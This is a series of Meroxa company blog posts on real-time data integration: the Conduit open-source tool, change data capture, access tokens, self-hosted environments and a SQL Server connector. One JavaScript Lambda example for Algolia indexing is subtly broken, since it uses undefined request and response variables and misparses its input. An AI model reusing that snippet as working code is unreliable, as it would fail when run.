It might be boiled down to the time it takes to do something or even decide to do or not do something. We see an increase infrictionless design. For example, “One-Click” buying, intuitive interface designs, intelligent options or defaults, and other time-savers.

We now expect things to be “smooth”, if not, it feels like a waste of time.

An example of internal vs external user experience that comes to mind is the difference between Amazon’s regular customer experience and that of AWS. The Amazon.com site meets (and sets) many of the expectations for speed and reliability. While using AWS often feels like the opposite. That may converge over time. If not, startups will continue to pop up around making a smoother experience to fill the gap.

You may be thinking “ok, I get it, folks now expect things in “real-time” or as close to it as possible” soooo …what is the holdup?

What is holding us back?

There are a few things slowing, or in some cases stopping the realization of “everything real-time all the time!”. Some things we have to just live with, but others we can do something about.

Physics

One that rears its head is physics. If you work in tech for long you will eventually get the question “why is it taking so long?!”. Sometimes it can be fixed, but sometimes you just have to say “we have not figured out how to go faster than the speed of light”. If you wanna move 5TB of data across the world over the public internet, it just takes a bit of time. Sure you can get a dedicated, better pipe, but eventually, you hit the reach of our understanding of physics. If you want your product to magically appear after you order it? Same problem. Wouldn’t be great if when you needed salt, coffee, whatever,bing it appeared. It would be like in that old showI dream of Jeannie. Well, that’s not going to happen, but we can make changes to get as close as possible.

Legacy Systems

If physics is not the limitation, another common one is thatexisting systems don’t support going faster. It could be that it has not become cost-effective or there is not enough demand yet for that option or more often than not, it is a legacy industry thathas not caught up yet. The pandemic forced many companies to undergo a “Digital Transformation”. So, many are getting closer to the current expectation. This is good for them because the pandemic also forced a spread of the speed expectation as people broke out of their old habits. Whether because they were working from home, ordering online more or ordering food, etc.

Mindset

Another reason, that may seem silly, but is very common, is simply that the folks that are working on a system havenot stepped back and thought about it. Seriously, how many things do we do just because we have been doing it that way?

Even in the days of the pervasive, high-speed internet, where it seems like everything has been done or made and you can have it delivered to your house for free in two days. Many of us don’t often step back and (re)think aboutwhy we are doing what we do and if there isa better way. If you made it this far, I am guessing you are not one of those people.

We can’t change physics, but if you are reading this, you likely have the right mindset. That leaves updating the tools to support another “new normal”. A normal where “real-time” is the default.

None of the systems can achieve “real-time” if the data it requires has not achieved it. So, we have to start there. This is whereMeroxa andConduit come to the rescue.

AtMeroxa, we believe there is a better way to work with real-time data. We have created a company around helping developers reap the benefits of this real-time data world. A platform to make the integration and use of real-time data easier for developers.Come give us a try. :)

Why Conduit? An evolutionary leap forward for real-time data integration.

Lyric Hartley — Thu, 10 Feb 2022 20:57:00 GMT

Who should read this?

Developers who build and/or manage data integration systems. It will be of specific interest to those working with real-time data pipelines, Kafka Connect, and managed streaming services.

Overview

Conduit is an open-source project to make real-time data integration easier for developers and operators. This article is broken into roughly the “Why” and the “How” behind Conduit.

Why bother creating “yet another” data project?
Why should WE build it?
How is Conduit different than Kafka Connect?

Why bother creating “yet another” data project?

We could have simply written another blog post about the many frustrations of working with Kafka Connect for data integration, but we felt it was better to be part of the solution. So, we built and open-sourced a project; a project that we use at Meroxa, that embodies the software development principles we have learned and live by. I will get into some of those principles and the thoughts behind the project in this post.

The project is named Conduit. While Conduit is not simply a Kafka Connect replacement, many of its features were informed by frustrations with Kafka Connect.

Apache Kafka does a great job at being the backplane, but the business value and where more developers spend their time is with the connectors.

We believe the data connector space is in need of some rethinking and innovation. We want to make connector development better suited for developer velocity and operational best practices.

We are not alone in the belief that this space is ripe for innovation. Jay Kreps (co-creator of Apache Kafka) has mentioned the innovations still needed in the connector space in his recent Keynote and in tweets like this one.

Why should WE build it?

We are a group of developers that have spent our careers developing software for large-scale deployments such as Heroku. Most of the software services/platforms we have worked on in recent years have been in the context of building and managing data services such as Apache Kafka and Kafka connectors.

In that time, we have learned many things about what works well and what leads to issues when developing and supporting large-scale systems. The good news is that most aspects that make a large system easier to tame also cascade down to making a small system pleasant to work with as well. While the opposite is not true.

One benefit in the world of software is that developers have collectively spent a lot of time working out effective methodologies. We have aspirations like “Optimized for Developer Happiness”. Many of those methodologies have influenced and helped us build better software at Meroxa. Such concepts as Agile and 12 Factor Apps have created certain expectations when working on projects and what a “good” project looks and feels like.

With those concepts as a background context, and years of working with Kafka Connect, we decided that we needed a better way to solve data integration problems. A way that adhered to our expectations of maintainable software services. While some concepts are just baked into the project because they are baked into the Meroxa DNA, below are some worth highlighting because they directly contrast with Kafka Connect.

How is Conduit different than Kafka Connect?

Easy local development

Kafka Connect requires a lot of setup (e.g. Apache Kafka, Zookeeper etc) to get to a point of doing development or even “kicking the tires”. It is a very time-consuming development life cycle. Attempting to quickly iterate on code or test things in isolation is very frustrating or impossible. In addition to that, because of all the external dependencies, you may end up with a mismatch between your local setup and what is actually in production or another developer’s environment.

Conduit addresses these issues in a few ways.

A single Go binary with no external dependencies. Download, run it, get going. No additional infrastructure needed.
A built-in Web UI. When you run that binary you can access the Web UI and try out configurations with very little upfront knowledge. Allowing you “play” with it out of the box.
SDK to simplify the connector development and testing. (Discussed later)
Easy, isolated local testing and test data generation. (Discussed later)

🗣 Conduit installation guide

SDK to speed up development

Starting to develop connectors with Kafka Connect is confusing and complicated. You are not encouraged when at every turn the documentation implies that dragons are around the corner and you should just pay to have the connectors handled for you. Can’t we just have an SDK?

We are working on a SDK to make it easy for you. Since our work is “in public”, you can keep an eye on what we are up to.

Connector development is language agnostic

Kafka Connectors are very Java-centric. While you can shoehorn other language support into working, it is not the suggested path and can be painful to maintain and not performant.

Conduit connectors are plugins that communicate with Conduit via a gRPC interface. This means that plugins can be written in any language as long as they conform to the standards-based interface.

Conduit architecture diagram.

Standard API Protocols

Conduit supports gRPC and REST for its management, making it easy to manage with software at scale. Plugins utilize gRPC for data movement and soon it will support the Kafka Connect API as well.

We believe gRPC is the best choice for streaming data APIs. In addition to the benefits of using gRPC for data movement, a large number of community members, projects, programming languages and platforms supported make it a perfect choice for a data project such as Conduit.

In contrast, Kafka Connect uses a custom binary protocol for data and a REST API or java property file for configuration. What this means is that client libraries have to be built and maintained as separate projects that are only useful in the Kafka ecosystem. We will also support the Kafka Connect API to allow you to migrate over existing connectors.

Conduit architecture diagram.

Conduit API information

Testing

Testing a Kafka connector requires a lot of infrastructure, visibility is poor, is too prone to misleading errors and generating test data is a pain. Instead of iterating on your code, you feel like you are testing a whole collection of infrastructure you have cobbled together, that may not look like production anyway. So, what were you really testing?

Testing with Conduit — since the connector and the dependencies are decoupled you can test your changes in isolation from the environment. We have created a test data generator and data validator to save you from wasting time trying to create test data to verify your connector is working.

Free and Open

Many Kafka Connectors can not be used by us at all. The limitations on the licenses create situations where you are either locked into the Confluent platform to continue use or in other cases you may be compliant but then as your business grows and involves you unknowingly move into a violation. Many developers experienced the pain with the license shift that Confluent made a few years ago. It sucks to find yourself in that situation. We don’t want that to happen to you.

Conduit is free to use and open source. The license is permissible and encourages developers to utilize and get value from it in their projects. We are strong believers in the value of standards and open source and that we should not be creating situations for lock-in or crippling projects and use cases.

Monitoring

Kafka Connect uses JMX for metrics. We found this to be cumbersome to work with and required additional setup to get metrics into our metrics platform.

Conduit supports sending metrics to Prometheus right out of the box. Prometheus is our preferred metrics platform as well as most developers we have heard from.

Conduit metrics exposed

Go vs Java

Kafka Connect is built with Java. For our use case, building a multi-tenant platform that leverages Kafka Connect wasn’t economical. Each provisioned connector took up a ton of memory, sometimes in excess of 1GB. If the usage isn’t consistent, you end up with a bunch of provisioned resources that didn’t have a lot of utilization.

Go uses very little resources, compiles to a small deployable binary, has a fast startup/shutdown time, is very stable, very performant and has a large community of projects and support.

Conduit leverages Goroutines that are connected using Go channels. Goroutines can take up as little as 2kB of memory. These basic functions can run simultaneously and independently, making multiple processes very efficient on multi-core machines. Unlike Java threads that consume large amounts of memory, Goroutines, which are used instead of threads, require much less RAM lowering the risk of crashing due to lack of memory.

The small binary size and resource usage provide a variety of benefits. At the large scale, say, If you are building a managed service like us, small memory use, faster boot times, minimal dependencies, small file size, etc translate into actual dollars saved on resources as well as a better user experience. On the small side of the scale, it means you can deploy to even a Raspberry Pi or to places we have not yet considered. But, even for just local development, it means getting up and going and productive quickly.

There are good reasons for Go becoming the language of choice for infrastructure and operation services such as Kubernetes, Terraform, Docker and others. Conduit is built to fit well into that ecosystem, which means better integration and support going forward. The value of a strong community is hard to overstate.

Easy Transformations

Kafka Connect requires you to write transformations in Java and implement a pile of files and functions via a confusing process with little help. It is more complicated than it needs to be. Transformations are widely needed in data pipelines by people even if they don’t build connectors. Transformations should be approachable and easy.

In Conduit, transformations are written in JavaScript. JavaScript is one of the most widely known development languages. Most developers already have to know JavaScript even if they also use another language as well.

Pipeline Centric

Kafka Connect is connector-centric which puts data transformations etc in the background and ties them to the specific connectors, this is problematic because we want to build pipelines, not just connectors. The goal is easy pipelines for real-time data. When you think in terms of pipelines you also make different choices for things like transformations. For example, in the Kafka Connect world the transformation only sits between the source and destination.

Conduit decouples where the transformation sits allowing you to transform from a source and or into a destination. Meaning that your pipeline can take into account how data enters and leaves it as different operations.

Conduit considers pipelines the primary goal and the architecture reflects that.

Ready to get started with Conduit?

Stay up to date with what we are working on, check out the Github Project board.

Review the documentation at the main website as well as the github repo.

Find out how to contribute.

Install Conduit by following the installation guide.

Easily migrate from Kafka Connect

Conduit will support the Kafka Connect API. This will allow you to bring your existing connectors.

Do you have feedback?

What are your struggles with data integration?

What are we missing?

What would you add to the requirements list?

Where is the modern data stack for software engineers?

Taron Foxworth — Fri, 04 Feb 2022 20:34:00 GMT

The Future of the Modern Data Stack looks excellent for data engineers. However, as a software engineer, I kind of feel left out. Where is the modern data stack for software engineers?

Marketing teams and data engineers need data to answer questions; software engineers need data to build features. This difference is why you’ll find that tools likeSegment don’t have connections for tools like ElasticSearch (Search Engine) or Redis (Cache).

A business may use the modern data stack to ask better questions about what’s happening in their business, applications, etc. A modern data stack is critical today if you want to succeed. Also, this world is filling fast with new SaaS data products and tools in abundance.

Here, I’d like to present a slightly different data problem for a separate data audience, software engineers.

Software engineers leverage data infrastructure in a very different way. The tools aren’t Google Analytics andClearbit, butUpstash andSupabase

Engineers need to move data back and forth to build features and infrastructure that adds customer value.

Where are my tools to help me usecode to move, process, or manipulate data between my application infrastructure? Today, I see a lot of one-off scripts, custom microservices, or tools that require me to scale a JVM.

The Data Integration Problem.

I want to tell you about a problem that every software engineer experiences: the data integration problem.

Due to infrastructure becoming easier to acquire and amazing tools likeHeroku,Render,PlanetScale,Upstash andSupabase, it’s getting easier to acquire new data infrastructure.

data infrastructure — a new system that generates or stores data.

Keep this definition in mind; it’s crucial.

In general, writing software is becoming more data-centric every day. Engineers commonly pull data from all sorts of places from within (or without) our infrastructure to build applications that are data-intensive.

Data-intensive applications are complex and made up of many systems like:

multiple microservices
caches
databases
event brokers
data warehouse
search engines
log aggregation systems
CRM
analytics platforms
… and third-party tools.

Our software systems contain many specialized tools that accelerate development and growth. These additional tools and platforms solve real problems and help teams move fast. But, there is one catch.

We are slowly acquiring more specialized data infrastructure if you zoom out a bit. A distributed data infrastructure means that our systems generate and consume data from more and more data stores.

If not appropriately managed, the number of “data tasks” will continue to increase. This means we will keep spending less time building features and spend more time integrating data.

I’m not sure this is what we want.

I keep asking myself: Is spending tons of time moving data around a valuable activity for software engineers?

Today, there are production tools that software engineers may use to solve this problem, like Apache Kafka and Airflow. But deploying and managing these systems isn’t the greatest experience and requires people on your team whose only job is to manage these systems.

I’d argue that “easy data movement for developers” is still a super unsolved problem.

The data-centric developer mindset

I’m not sure this is even a problem that will go away. We will continue to use specialized tools that accelerate development and growth. In most cases:

ElasticSearch will always offer a better developer experience for searching than MySQL.

Snowflake will always offer a better developer experience for data warehousing than PostgresSQL.

There will be no magic data store 🪄. We will forever be in a data ecosystem that won’t consolidate much because data infrastructure will always have design decisions that will be good for one use case and possibly poor for others.

With that being said, thedata-centric mindset is becoming more common when building software.

With data at the forefront of system design, engineers who used to ask themselves: “What database will I use for this application?”. Will now be asking themselves: “How will this new application integrate with my data infrastructure.”

The next generation of applications will be built with a data-first mindset.

What is the data integration problem?

Now, we can look at this problem from a data-centric mindset. Data integration problems are tasks that take the following form:

Data in system A needs to get to system B.
Data changes in A need to be continuously replicated into B.

We can map a vast landscape of problems to these. For example:

Log Aggregation
Syncing data from PostgreSQL to Redis for caching.
Listening to changes from a PostgreSQL table and writing them to a data warehouse.
Watching a file for changes and writing the changes to a database.
Consuming data from a Kafka topic and writing it somewhere else.

If you squint and tilt your head to the side, you’ll notice that all of these problems are moving data from one place to another. These problems are specific to any specific industry; it applies to software engineering as a whole.

Some problems, such as the need for data warehousing you’d hit as you scale; others, like streaming data from a log, are ubiquitous amongst most software engineers.

We always code first, think later.

These problems move data from one place to another, yet we typically use different tools or build a custom tool. Moving data from one place to another is a task that looks simple on the surface, mainly because it’s super convenient to write a small service that does the data task you need.

But, most will eventually find that:

Datastores and schemas improve, change and update over time.
Managing real-time syncing between data infrastructure is 🥲.
Relying on external data infrastructure (SaSS tools, External APIs) is impossible.

Then, some may then discoverThe Log and adopt Kafka. Kafka is anoutstanding event-based streaming broker. But, it’s a massive addition to your infrastructure just to move data from one place to another.

What Now?

This is why we are working on a project calledConduit at Meroxa. We hope to change the experience software engineers have with data.

At a high level, Conduit is a data streaming tool written in GoLang. It aims to provide the best software developer experience for building and running real-time data pipelines.

I’d love to know what you think, and I’d love to see more data tools for software engineers.

Thank you for reading. Have a beautiful day ☀️

Conduit: Streaming Data Integration for Developers

Taron Foxworth — Fri, 21 Jan 2022 20:38:00 GMT

Let’s be honest, spending tons of time moving data around is not a fun or valuable activity for software engineers. Most of the tooling to solve this problem primarily targets data analysts or data engineers, not software engineers.

Today, the tooling for software engineers is incredibly complex and challenging to operate. For example, we have to install distributed systems with multiple dependencies, which also happen to be distributed systems 🙃 .

Moving data between data infrastructures should be much easier and free. Today, we’re happy to announce that we’re open-sourcing Conduit, Meroxa’s data integration tool built to be flexible, extendible, and provide developer-friendly streaming data orchestration.

Writing software is becoming moredata-centric every day. Software engineers now commonly pull data from all sorts of places from within (or without) their infrastructure to provide data-driven features to their users.

Let’s make that easier.

Getting Started with Conduit

To get started with Conduit, you can head over to ourGitHub releases page and:

Download Conduit Binary
Unzip
Build Pipelines 🚀

If you’re on Mac, it will look something like this:

$ tar zxvf conduit_0.1.0_Darwin_x86_64.tar.gz
$ ./conduit

Then, from the very beginning, you’ll be able to open your web browser, navigate to[http://localhost:8080/ui/](http://localhost:8080/ui/) to start building pipelines.

Conduit ships with a UI for local development. Then, once you get data moving, there is much more for you to explore.

Why We Made Conduit?

At Meroxa, our vision is to enable developers to build streaming data applications without worrying about deploying and monitoring complex distributed infrastructure like Apache Kafka and Kafka Connect.

But, to make those applications possible, you’ve got to be able to move between nodes in a directed acyclic graph (DAG) with minimal latency and using as few resources as possible.

Not only that, we needed:

**Easy deployment:**With a large number of customers moving data within Meroxa’s infrastructure, any efficiencies start to compound, especially when running a managed service. (cough...cough JVM)
**Allow for DevOps and Monitoring best practices:**We wanted to ship logs straight to Prometheus without dealing with intermediate agents. In the Java world, we would have had to use JMX, which comes with its own set of dependencies and potential failures.
**An excellent connector developer experience:**Developing connectors should be consistent, straightforward, and familiar with modern languages.
**A User Interface:**We wanted a baked-in user interface to aid local development. This also makes getting started super easy.
To control data movement with code: We needed a tool-driven via config files, a REST API, or gRPC. Having the ability to use software to manage your data moment systems offers compelling use cases.
Be Open Source — Licensing should be permissive (open-source, ftw!)

In the end, we couldn’t find anything that met all of these requirements, so we embarked on creating our own.

From a philosophical perspective, this functionality should be made available to all developers. We should all work toward a future where moving data within production architectures doesn’t prevent data-centric features from being built. Free data integration is what’s going to get us to the next generation of software.

What can you build today?

Today, you can build pipelines that move data from:

Kafka to Postgres
File to Kafka
File to File
PostgreSQL to Postgres
PostgreSQL to Amazon S3

We only started with these data sources, but there are many more coming down the pipeline (pun intended). If you have any ideas,we’d love to hear them.

However, even with the connectors, we have today, you should start to think about and build the following use cases:

Sending messages to and from Kafka to other data stores.
Storing changes of your PostgreSQL replication log in Amazon S3 for auditing.
Streaming logs to Kafka.

We are already using this behind the scenes at Meroxa. If you create a pipeline with Meroxa, it’s using Conduit.

What’s Next

We arebuilding Conduit out in the open. It’s an ambitious project, but we think we have something pretty cool. I hope youcheck it out.

Here are your next steps:

Chat with the Conduit team in theDiscord Community
Request features/ ask questions about Conduit inGitHub Discussions
Send bug reports toGitHub Issues.
Check out theConduit Documentation.
Show us love onTwitter.

Introducing Self-Hosted Environments: Bringing Data Isolation to Your Cloud

Sara Menefee — Tue, 04 Jan 2022 16:34:00 GMT

Today, we’re excited to announce theSelf-Hosted Environments Beta. We’ve learned from our customers that with the need for data security and compliance on the rise, building and maintaining environments and dependencies to support their existing DevOps processes and workflows is a non-trivial matter.

Currently, engineering teams must choose between speed and compliance. When building or modifying data infrastructure, this can mean lost time or potentially putting sensitive data at risk.

Self-Hosted Environments can now be provisioned with Meroxa in an existing cloud provider with just a few steps. Environments play a key role by encapsulating settings in an isolated subnet where data application resources can exist and operate securely. By sequestering development and testing efforts in environments as part of the DevOps lifecycle, engineers mitigate impact risk on existing systems and customers.

We’ve done the work to eliminate implementation complexity for our customers while still offering complete operational control over their data security, compliance, and performance needs.

Getting started

To get started,sign-up for the Self-Hosted Environments Beta.

A member of our team will reach out with the next steps. You will need access to your cloud provider to generate credentials with the necessary permissions to provision an environment.

In the meantime, request a demo of Meroxa to gain access to a Meroxa account.

With Self-Hosted Environments, you get all the power and utility of the Meroxa Platform. Allowing easy creation and management of Resources, Connectors, and Pipelines through our Dashboard or CLI — all with your data securely isolated in your cloud.

The Meroxa Platform performs a preflight check to verify permissions before generating a new VPC and the associated dependencies in your cloud. A secure remote connection will be maintained automatically with the Meroxa Platform for the control plane to ensure everything operates smoothly.

To provision your Self-Hosted Environment, you will need credentials from yourcloud provider with the appropriate permissions.

Creating Self-Hosted Environments is made easy through ourCLI. Simply name the environment, indicate the type, provider, and include the configuration that contains your cloud provider credentials. See ourdocumentation to learn more.

Once successfully provisioned, you are ready to start creating Resources, Pipelines, and Connectors to move your data within your Self-Hosted Environment.

In the dashboard, you have the option to indicate which environment you’d like to create a Resource or Pipeline for by selecting the environment in the dropdown. The default environment is ‘common’.

When using the CLI, you can indicate which environment you’d like to create your Resources or Pipelines by using the `env` tag followed by the environment name in the CLI command.

What’s supported

Self-Hosted Environments may be provisioned in the following Amazon Web Services (AWS) regions:

us-east-1(N. Virginia)
us-east-2(Ohio)
us-west-2 (Oregon)
ap-northeast-1 (Tokyo)
eu-central-1 (Frankfurt)

We do not currently support the provisioning of environments within existing VPCs.

Don’t see your cloud provider or preferred region? You can stillsign-up for the beta — we’d love to hear how we might best support your needs!

Learn more

Are you as excited about real-time data applications as we are? We’d love for you to take Self-Hosted Environments for a spin. Sign-up for the beta today — we will be in touch with the next steps! For more details, see our documentation.

Sign-up for the Self-Hosted Environments Beta.

As always,

You can reach us directly at support@meroxa.com.
Join our Discord community.
Follow us on Twitter.

How to Obtain a Meroxa Access Token

Taron Foxworth — Mon, 06 Sep 2021 17:02:00 GMT

The Meroxa access token is needed to authenticate to the Meroxa API programmatically. For example, the token allows you to build pipelines withTerraform.

To obtain a token, you must install theMeroxa CLI. Then, follow these steps:

$ meroxa login

Get token.

Themeroxa config command allows you access details about your Meroxa environment.

For security, the output is obfuscated unless you use the--json command:

$ meroxa config --json

Other Methods

If you're familiar withjq, in one command, you can parse the JSON output and only print the Meroxa token:

$ meroxa config --json | jq -r .config.access_token

You could also add this to your.zshrc or.profile to always have it available in your environment.

$ export MEROXA_REFRESH_TOKEN=$(meroxa config --json | jq -r .config.access_token)

Stream Your Database Changes with Change Data Capture: Part Two

Taron Foxworth — Wed, 01 Sep 2021 20:11:00 GMT

This is part two of a series on Change Data Capture (CDC). In part one,we defined change data capture, explored how data is captured, and the pros and cons of each capturing method. In this article, let’s discuss the use cases of CDC and look at the tools that help you add CDC into your architecture.

Change Data Capture helps enableevent-driven applications. It allows applications to listen for changes to a database, data warehouse, etc., and act upon those changes.

At a high level, here are the use cases and architectures that arise from acting on data changes:

Extract, Transform, Load (ETL): Capturing every change of one datastore and applying these changes to another allows for replication (one-time sync) and mirroring (continuous syncing).
Integration and Automation: The action taken on data change events can automate tasks, trigger workflows, or even execute cloud functions.
History: When performing historical analysis on a dataset, having the current state of the data and all past changes gives you complete information for a higher fidelity analysis.
Alerting: Most of the time, applications send an event to a user whenever the data they care about changes. CDC can be the trigger for real-time alerting systems.

Let’s explore.

Extract, Transform, Load

As of date, one of the most common use cases for CDC is Extract, Transform, Load (ETL). ETL is a process in which you are capturing data from one source (extract), processing it in some way (transform), and sending it to a destination (load).

Data replication (one-time sync) and mirroring (continuous replication) are great examples of ETL processes. ETL is an umbrella term that encompasses very different use cases such as:

Ingesting data from a database into a data warehouse to run analytic queries without impacting production.
Keeping caches and search index systems up-to-date

Not only can CDC help solve these use cases, but it’s also the best way to solve these problems. For example, to mirror data to a data warehouse, you must capture and apply anychanges as they happen to the source database. As discussed withStreaming Replication Logs in part one of the series, CDC is used by databases to keep standby instances up-to-date for failover because it’s effective and scalable. When tapping into these events in a wider architecture, your data warehouse can be as up-to-date as a standby database instance used for disaster recovery.

Keepingcaches and search index systems up-to-date are also ETL problems and great CDC use cases. Large applications created today are comprised of many different data stores. For example, certain architectures will leverage Postgres, Redis, and Elasticsearch as a relational database, caching layer, and search engine. All are systems of record designed for specific data use cases, but data needs to be mirrored in each store.

You never want a user to search for a product and then find out it longer exists. Stale caches and search indexes lead to horrible user experiences. CDC can be used to build data pipelines that keep these stores in sync with their upstream dependencies.

In theory, a single application could write to Postgres, Redis, and Elasticsearch simultaneously, but “Dual Writes” can be tough to manage and can lead to out-of-sync systems. CDC offers a stronger, easier-to-maintain implementation. Instead of adding the logic to update indexes and caches to a single monolithic application, one could create an event-driven microservice that can be built, maintained, improved, and deployed independently from user-facing systems. This microservice can keep indexes and caches up to date to ensure users operate on the most relevant data.

Integration and Automation

The rise of SaaS has exploded the number of tools that generate data or need to be updated with data. CDC can provide a better model for keeping Salesforce, Hubspot, etc., up to date and allow automation of business logic that needs to respond to those data changes.

Each of the use cases we described above sends data to a specific destination. However, the most powerful destination is a cloud function. Capturing data changes and triggering a cloud function can be used to perform every use case mentioned (and not) in this article.

Cloud functions have grown tremendously because there are no servers to maintain; they automatically scale and are simple to use and deploy. This popularity and usefulness have been apparent and proven in architectures like the JAMStack. CDC fits perfectly with this architecture model.

Today, Cloud functions are triggered by an event. This event could be when afile is uploaded to Amazon S3 or an HTTP request. However, as you might have guessed, this trigger event could be emitted by a CDC system.

For example, here is an AWS Lambda Function to accept a data change event andperform Algolia search indexing:

const algoliasearch = require("algoliasearch");
const client = algoliasearch(process.env.ALGOLIA_APP_ID, process.env.ALGOLIA_API_KEY);
const index = client.initIndex(process.env.ALGOLIA_INDEX_NAME);
 
exports.handler = async function(event, context) {
  console.log("EVENT: \\n" + JSON.stringify(event, null, 2))
  const request = event.Records[0].cf.request;
 
  // Accessing the Data Record
  //  

  const body = Buffer.from(request.body.data, 'base64').toString();
  const { schema, payload } = body;
  const { before, after, source, op } = payload;

  if (req.method === 'POST') {
    try {
      // if read, create, or update operation create o update index
      if (op === 'r' || op === 'c' || op === 'u') {
        console.log(`operation: ${op}, id: ${after.id}`)

        after.objectID = after.id
        await index.saveObject(after)
      } else if (op === 'd') {
        console.log(`operation: d, id: ${before.id}`)
        await index.deleteObject(before.id)
      }
      return res.status(200).send()
    } catch (error) {
      console.log(`error: ${JSON.stringify(error)}`)
      return res.status(500).send()
    }
  }
 
  return context.logStreamName
}

Every time this function is triggered, it will look at the data change (op) and perform the equivalent action in Algolia. For example, if a delete operation occurs in the database, we can perform a[deleteObject](https://www.algolia.com/doc/api-reference/api-methods/delete-objects/)in Algolia.

Functions that respond to CDC events can be small and simple. But, CDC — along with event-based architectures — can simplify otherwise very complex architectures as well.

For example, implementing Webhooks as a feature within your application becomes a more straightforward problem with CDC. Webhooks allow users to trigger aPOST request when certain events occur, typically data changes. For example, withGithub, you can trigger a cloud function when a pull request is merged. A merged pull request is anUPDATE operation to a data store, which means a CDC system can capture this event. Generally, most webhook events can be translated toINSERT``UPDATE andDELETE operations that a CDC system can capture.

History

You may not want to act on the CDC event but only store the raw changes in some cases. Using CDC, a data pipeline can store all change events to a cloud bucket for long-term processing and analysis. The best place to store the data for historical analysis is within a cloud bucket, referred to as a data lake.

A data lake is a centralized store that allows you to store all your structured and unstructured data at any scale. Data lakes typically leverage cloud object bucket solutions like Amazon S3 orDigital Ocean Spaces.

For example, once the data is in a data lake, SQL query engines like Amazon Presto can run analytic queries against the change datasets.

While storing the raw changes, you not only have the current state of the data, you have all the previous states (historical). That’s why CDC adds a ton of value to historical analysis.

Having historical data allows you to support disaster recovery efforts and also allows you to answer retroactive questions about your data. For example, let’s say your team redefined how Monthly Active Users (MAU) are calculated. With the complete history of a user data set, one could perform the new MAU calculations based on any date in the past and compare the results to the current state.

This rich history also has user-facing value. Audit logs and activity logs are features that display data changes to users.

Capturing and storing change events offers a better architecture when these features are implemented. Like in Webhooks, audit logs and activity logs are rooted in operations that a CDC system can capture.

Alerting

The job of any alerting system is to notify a stakeholder of an event. For example, when you receive a new email notification, you are notified of anINSERT operation to an email data store. Typically, most alerts are related to a change in a data store, which means that CDC is great for powering alerting systems.

For example, let’s say you have an eCommerce store. After enabling CDC on a table of purchases, you could capture the change event and notify the team by performing a Slack alert when there are new purchases.

Just like audit or activity logs, notifications powered by CDC can not only provide information about the event that occurred but also provide details of the change itself:

Tom has updated the title from "Meeting Notes" to "My New Meeting."

This alerting behavior also has internal value. From an infrastructure monitoring perspective, CDC events can provide insight into how users interact with your application and data. For example, you could see when and how users add, update, or delete information. This data can be sent toPrometheus UI to monitor and act on this information.

Getting Started with CDC

Inpart one, we talked about the various ways CDC is commonly implemented:

Polling
Database Triggers
Streaming Logs

These can all be used to build the use cases we’ve discussed in this article. Best of all, since CDC focuses on the data, the process is programming language agnostic and can be integrated into most architectures.

Polling and Triggers

When using polling or database triggers, there is no overhead and nothing to install. You can get started by building your queries to poll or by leveraging your databases’ triggers if they are supported.

Streaming Logs

Databases use streaming replication logs for backup and recovery, which means that most databases provide some CDC behavior out of the box. How easy it is to tap into these events depends on the data store itself. The best place to get started is by digging into your database’s replication features. Here are some replication log resources for some of the most popular databases:

To get started with streaming logs, the answer is tightly coupled to the database in question. In future articles, I’ll explore what it looks like for each of these.

Implementing any of these directly does take some time, planning, and effort. If you’re trying to get started with CDC, the lowest barrier to entry is adopting a CDC tool that knows how to communicate and capture changes from the data stores you use.

Change Data Capture Tools

Here are some great tools for you to evaluate:

Debezium

Debezium is by far the most popular CDC tool. Its well-maintained, open-sourced and built on top of Apache Kafka. It supports MongoDB, MySQL, PostgreSQL, and more databases out of the box.

At a high level, Debezium hooks into the replication logs of the database and emits the change events into Kafka. You can even run Debezium standalone without Kafka.

What’s really nice is that Debezium is all configuration-based. After installing and configuring Debezium, you can configure connections to your datastore using a JSON-based configuration:

{
  "name": "fulfillment-connector", 
  "config": {
    "connector.class": "io.debezium.connector.postgresql.PostgresConnector", 
    "database.hostname": "192.168.99.100", 
    "database.port": "5432", 
    "database.user": "postgres", 
    "database.password": "postgres", 
    "database.dbname" : "postgres", 
    "database.server.name": "fulfillment", 
    "table.include.list": "public.inventory" 
  }
}

Once connected, Debezium will perform an initial snapshot of your data and emit change events to a Kafka Topic. Then, services canconsume the topics and act on them.

Here are some great places to get started with Debeizium:

Meroxa

Meroxa is a real-time data orchestration platform that gives you real-time infrastructure. Meroxa removes the time and overhead associated with configuring and managing brokers, connectors, transforms, functions, and streaming infrastructure. All you have to do is add your resources and construct your pipelines. Meroxa supports PostgreSQL, MongoDB, Microsoft SQL Server, and more.

CDC pipelines can be built in a visual dashboard or using the Meroxa CLI:

# Add Resource
$ meroxa resource add my-postgres --type postgres -u postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB  # Add Webhook
$ meroxa resource add my-url --type url -u $CUSTOM_HTTP_URL  # Create CDC Pipeline$ meroxa connect --from my-postgres --input $TABLE_NAME --to my-url

I can’t wait to see what you build. 🚀

If you have any questions or feedback, I’d love to hear them. You can:

Discuss with me our Discord community.
Reach out to me on Twitter.

Introducing Microsoft SQL Server Connector Beta

Taron Foxworth — Thu, 19 Aug 2021 15:33:00 GMT

Real-time SQL Server Change Data Capture (CDC)

Microsoft SQL Server is a powerful, widely used relational database management system. Today, we’re releasing a public beta version of our Microsoft SQL Server as a source for real-time data streams.

As a source, you can build pipelines that act on changes from SQL Server. For example, you can:

Extract Transform Load (ETL) into a Data Warehouse.
Real-time replication and sync to other data stores.

With Meroxa, it’s all streaming, real-time, and your pipelines will be up and running in minutes not months.

Getting Started

To begin sending data to SQL Server, perform the following steps:

Create an Account — By using thedashboard, or the CLI.
Setup —Configure your Microsoft SQL Server instance and acquire the credentials needed to talk to Meroxa.
Add Resource — Use thedashboard or[meroxa resource create](https://docs.meroxa.com/cli/cmd/meroxa-resources-create) command to add to your Meroxa Resource Catalog.

SQL Server Source Connector

As a source, you can capture changes from SQL Server and send toAmazon Redshift, Webhooks, Amazon S3 or any other destination.

The SQL Server source is a CDC connector that leveragesSQL Server transaction log, which contains a list of every change events. This connector will perform an initial snapshot of the data. Then, it will stream everyINSERT,UPDATE,DELETE operation and push the events into a Meroxa stream.

This connector will emit data records in the following format:

To create a source, you can use thedashboard ormeroxa resource create command to create a new connector:

meroxa resource create mysqlserver \--type sqlserver \--url "sqlserver://$MSSQL_USER:$MSSQL_PASS@$MSSQL_URL:$MSSQL_PORT/$MSSQL_DB"

For more, seeMicrosoft SQL Server Documentation.

I can’t wait to see what you build 🚀

The SQL Serverconnector is currently in beta. We encourage customers to start using the connector in their staging and development environments and provide feedback. Following the beta phase, we will make the connector generally available for use in all environments (dev, staging, and production). Meroxa follows this pattern for all connectors that it releases to ensure a great experience for you.

As always,

